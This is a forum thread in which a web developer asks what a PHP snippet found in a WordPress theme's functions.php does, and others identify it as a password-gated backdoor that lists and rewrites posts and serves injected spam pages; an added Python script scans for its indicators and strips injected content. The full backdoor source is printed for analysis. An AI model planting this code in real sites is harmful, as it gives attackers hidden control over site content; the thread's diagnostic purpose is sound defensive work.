BCF: Bike Chat Forums


Any coders : PHP / mySQL - Hacked file help


Jayy
Mr. Ponzi



Joined: 08 Jun 2009
PostPosted: 23:56 - 17 May 2017    Post subject: Any coders : PHP / mySQL - Hacked file help

Well, I found some code inside a functions.php file of a Wordpress install. Client had told me he found "free premium plugins" and installed them... I thought, oh no, what have you done?

Any ideas what this does?

As far as I can work out, some kind of password sniffer?

Code:
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '24daf8bf7eb6d45d9aa91bf1979b414a'))
   {
      switch ($_REQUEST['action'])
         {
            case 'get_all_links';
               foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                  {
                     $data['code'] = '';
                     
                     if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                        {
                           $data['code'] = $_[1];
                        }
                     
                     print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                  }
            break;
            
            case 'set_id_links';
               if (isset($_REQUEST['data']))
                  {
                     $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
                     
                     $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                     if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                     if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                        {
                           print "true";
                        }
                  }
            break;
            
            case 'create_page';
               if (isset($_REQUEST['remove_page']))
                  {
                     if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                        {
                           print "true";
                        }
                  }
               elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                  {
                     if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                        {
                           print "true";
                        }
                  }
            break;
            
            default: print "ERROR_WP_ACTION WP_URL_CD";
         }
         
      die("");
   }

   
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
   {
      $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
      if ($data -> full_content)
         {
            print stripslashes($data -> content);
         }
      else
         {
            print '<!DOCTYPE html>';
            print '<html ';
            language_attributes();
            print ' class="no-js">';
            print '<head>';
            print '<title>'.stripslashes($data -> title).'</title>';
            print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
            print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
            print '<meta name="robots" content="index, follow" />';
            print '<meta charset="';
            bloginfo( 'charset' );
            print '" />';
            print '<meta name="viewport" content="width=device-width">';
            print '<link rel="profile" href="http://gmpg.org/xfn/11">';
            print '<link rel="pingback" href="';
            bloginfo( 'pingback_url' );
            print '">';
            wp_head();
            print '</head>';
            print '<body>';
            print '<div id="content" class="site-content">';
            print stripslashes($data -> content);
            get_search_form();
            get_sidebar();
            get_footer();
         }
         
      exit;
   }


?><?php

ScaredyCat
World Chat Champion



Joined: 19 May 2012
PostPosted: 00:08 - 18 May 2017

Looks to me like it gives someone the ability to remotely update post content. Emergency quick fix is to change the password. Presumably the site is running the latest version of wordpress? If so, download the tarball and extract it over the top of the base wordpress files. Take backups first, in case you fuck it up.

Most definitely a problem.

edit:

looks like class.wp.php is going to be a problem too.

Following references found

https://stackoverflow.com/questions/40350225/malware-research-what-this-code-do-in-php

https://www.reddit.com/r/Wordpress/comments/5ll3nk/weirdsuspicious_code_on_the_top_of_themes/
____________________
Honda CBF125 ➝ NC700X
Honda CBF125 ↳ Speed Triple

Kickstart
The Oracle



Joined: 04 Feb 2002
PostPosted: 00:25 - 18 May 2017

Hi

Yep, allowing some posts to be modified by a user with a specific password. Also the ability to list out some posts (probably to make it easier to screw around with them).

Note that once used it will likely screw up the details on the post table, and this might already have happened.

Amusing that a hacky type script is using mysql_escape_string.

All the best

Katy
____________________
Traxpics, track day and racing photographs - Bimota Forum - Bike performance / thrust graphs for choosing gearing

Jayy
Mr. Ponzi



Joined: 08 Jun 2009
PostPosted: 13:17 - 18 May 2017

Scenario was: Client had a guy "doing website stuff" for him but had messaged me to remove all his access as he didn't trust this guy.

I start changing all passwords on hosting, Wordpress, emails, etc etc.

Then he asks about is there a way to get login notifications, so I enabled them via Wordfence.

Wordfence flagged the file as being found 20 hrs ago when I started looking in to it.

Compared the functions.php file with a backup I had from 6 months ago of his site and saw the added code I pasted up there.

From doing my own research and following those links ScaredyCat, I'm not sure what damage this has done.

I don't see the class.wp.php file, nor do I see any of those other files they reference but I did see the _datalist table in the database (nothing in it).

Wordfence detects no core files changed, so I don't see the point in replacing all of them.

All plugins are up to date and Wordpress is. All passwords changed and backups taken.

Will keep an eye on it, client is reluctant to want to spend money on having it fixed properly (don't you just love them?).

Client is the one who installed the premium version of Yoast SEO.... which he downloaded off a nulled site.

I actually see nulled plugins installed on sites quite frequently these days, I don't know whether it's some office person who doesn't really understand the gravity of what they're doing or some dev who also doesn't understand / wants to save a couple bucks :/

ScaredyCat
World Chat Champion



Joined: 19 May 2012
PostPosted: 13:23 - 18 May 2017

Jayy wrote:
    Compared the functions.php file with a backup I had from 6 months ago of his site and saw the added code I pasted up there.

Then it's been there for >6 months, it's still a problem. That code is NOT in ANY of the installs I look after and they are all up to date. I double checked when you posted this.

Jayy wrote:
    Wordfence detects no core files changed, so I don't see the point in replacing all them.

If wordfence doesn't see that any core files have changed then it's worthless.

Download the wordpress tarball/ zip and extract it on your PC. Look at functions.php in the includes folder and you'll see that the code does not exist.

Code:
andy@nevdull:~/_Downloads/wordpress$ grep -Ri get_all_links ./

andy@nevdull:~/_Downloads/wordpress$

____________________
Honda CBF125 ➝ NC700X
Honda CBF125 ↳ Speed Triple


Last edited by ScaredyCat on 13:36 - 18 May 2017; edited 2 times in total

Kickstart
The Oracle



Joined: 04 Feb 2002
PostPosted: 13:24 - 18 May 2017

Hi

Check the post_content field on the posts table. If the hack had been utilised it could have changed the data there, and a lot of the pages are basically stored in there.

All the best

Katy
____________________
Traxpics, track day and racing photographs - Bimota Forum - Bike performance / thrust graphs for choosing gearing
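The two checks suggested above (ScaredyCat's grep over an unpacked WordPress tree for the backdoor's strings, and Katy's advice to inspect post_content for tampering) can be scripted. The following Python is an added example, not code from the thread or from WordPress: it scans .php files for the indicators that appear in the pasted backdoor (its action names, its `ERROR_WP_ACTION` string, the `wp_cd_code` marker and the hard-coded password hash), and it finds and strips the `<div id="wp_cd_code">…</div>` fragments that the `set_id_links` action appends to a post. The sample file contents and posts are constructed for the demo; the regex is the same one the backdoor uses, so it removes exactly what the backdoor inserts.

```python
"""Triage helpers for the functions.php backdoor discussed in the thread.
Added example; file contents and post rows below are constructed samples."""
import os
import re
import tempfile

# Indicator strings copied from the backdoor itself. A match on any of them
# in a theme or plugin file is worth a manual look; the generic 'create_page'
# is deliberately left out to avoid false positives on legitimate code.
BACKDOOR_INDICATORS = (
    "get_all_links",
    "set_id_links",
    "ERROR_WP_ACTION",
    "wp_cd_code",
    "24daf8bf7eb6d45d9aa91bf1979b414a",
)

# Same pattern the backdoor uses to locate its own injected block (the 's'
# flag in PHP corresponds to re.S here, so the block may span lines).
INJECTED_DIV_RE = re.compile(r'<div id="wp_cd_code">(.*?)</div>', re.S)


def scan_source(text):
    """Return the indicators present in one PHP source string, in table order."""
    return [ind for ind in BACKDOOR_INDICATORS if ind in text]


def scan_tree(root):
    """Walk a directory like `grep -Ri` and map each flagged .php path to its hits."""
    hits = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_source(fh.read())
            if found:
                hits[path] = found
    return hits


def find_injected(post_content):
    """Return the HTML fragments the backdoor hid inside a post's content."""
    return INJECTED_DIV_RE.findall(post_content)


def clean_post(post_content):
    """Strip the injected div(s); returns (cleaned_content, number_removed)."""
    return INJECTED_DIV_RE.subn("", post_content)


def triage_posts(posts):
    """posts: iterable of (ID, post_content) rows. Returns IDs carrying an injected div."""
    return [pid for pid, content in posts if INJECTED_DIV_RE.search(content)]


# --- constructed samples -------------------------------------------------
CLEAN_FUNCTIONS_PHP = "<?php\nadd_action('init', 'my_theme_setup');\n"

INFECTED_FUNCTIONS_PHP = (
    "<?php\n"
    "if (isset($_REQUEST['action']) && $_REQUEST['password'] == "
    "'24daf8bf7eb6d45d9aa91bf1979b414a') {\n"
    "  switch ($_REQUEST['action']) {\n"
    "    case 'get_all_links': break;\n"
    "    default: print 'ERROR_WP_ACTION';\n"
    "  }\n"
    "}\n"
)

SAMPLE_POSTS = [
    (101, "<p>Track day write-up.</p>"),
    (102, '<p>New tyres fitted.</p><div id="wp_cd_code">'
          '<a href="http://example.invalid/spam">cheap pills</a></div>'),
    (103, '<p>Chain adjusted.</p><div id="wp_cd_code">\n'
          '<a href="http://example.invalid/more">more spam</a>\n</div>'),
]


def demo_scan_tree():
    """Lay the samples out like a WordPress install in a temp dir and scan it.
    Returns the flagged paths relative to the root, with '/' separators."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "sometheme")
        core = os.path.join(root, "wp-includes")
        os.makedirs(theme)
        os.makedirs(core)
        with open(os.path.join(theme, "functions.php"), "w") as fh:
            fh.write(INFECTED_FUNCTIONS_PHP)
        with open(os.path.join(core, "functions.php"), "w") as fh:
            fh.write(CLEAN_FUNCTIONS_PHP)
        return {os.path.relpath(p, root).replace(os.sep, "/") for p in scan_tree(root)}


if __name__ == "__main__":
    print("flagged files:", demo_scan_tree())
    print("posts with injected div:", triage_posts(SAMPLE_POSTS))
    for pid, content in SAMPLE_POSTS:
        cleaned, n = clean_post(content)
        if n:
            print(f"post {pid}: removed {n} block(s) ->", cleaned)
```

To use it on a real site, point `scan_tree` at the document root (theme and plugin folders included, since that is where this one lived) and feed `triage_posts` the `ID` and `post_content` columns exported from the posts table. Like the grep in the thread, the indicator list only catches this variant; a reworded copy of the backdoor would need a diff against a known-good copy of the theme, as Jayy did with his six-month-old backup.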

Jayy
Mr. Ponzi



Joined: 08 Jun 2009
PostPosted: 15:25 - 18 May 2017

I know it hasn't been there 6 months, Wordfence detected it a couple days ago (20 hrs prior to me checking it out) and Wordfence has been on there for 6 months+.

It's entirely possible it has been sitting dormant but I'm also confident Wordfence would have detected it as it's the best security plugin on the market.

I should have been more clear that it was in functions.php in the theme folder not core Wordpress.

Also running Patchman on the server so it's checking files against every version of Wordpress as well as Wordfence scanning, so again, confident that no core Wordpress files have been modified.

I'm more curious as to how this got on there. Client installed that nulled plugin months ago.